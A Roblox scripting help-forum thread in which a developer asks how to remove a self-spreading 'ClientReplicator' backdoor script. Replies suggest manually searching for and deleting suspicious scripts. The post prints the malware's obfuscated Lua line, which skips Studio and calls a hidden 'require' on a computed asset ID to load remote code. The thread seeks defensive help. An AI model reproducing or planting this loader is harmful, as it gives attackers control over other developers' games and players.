Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
0

Please help. Terrible Lua virus in a game I am working on. How to fix?

Asked by 3 years ago

So every time i join the game outside of studio, a free model prompt begins to spam my screen. I have deleted all free models and used RoDefender with no luck. There is also a mysterious script called ClientReplicator that pops up in ServerScriptService whenever a player joins, and it remains there after they leave. It will create more and more for each joined player. The contents of the script are as follows:

local uKaQU=game:GetService("RunService"):IsStudio();local RkFQ7=true;local Tzms7=false;local MvC5A=getfenv;if uKaQU ~= RkFQ7 then MvC5A()[string.reverse(tostring(string.reverse("\114\101\113\117".."\105\114\101")))](0x39DB7846*(2+2+2-1+2+2-4));end

Please help.

0
In the filter workspace searchbar, search "script" and delete any weird scripts you see. Be careful not to delete your own scripts or any scripts that have nothing to do with this. LazokkYT 117 — 3y
0
RoDefender is a plugin that SEARCHES common virus names. Naming a script called "Spread" will be detected by RoDefender and deleted because it's a common script name in viruses. In this case you'll have to manually search for weird or dodgy scripts, like LazokkYT said. nekosiwifi 398 — 3y

Answer this question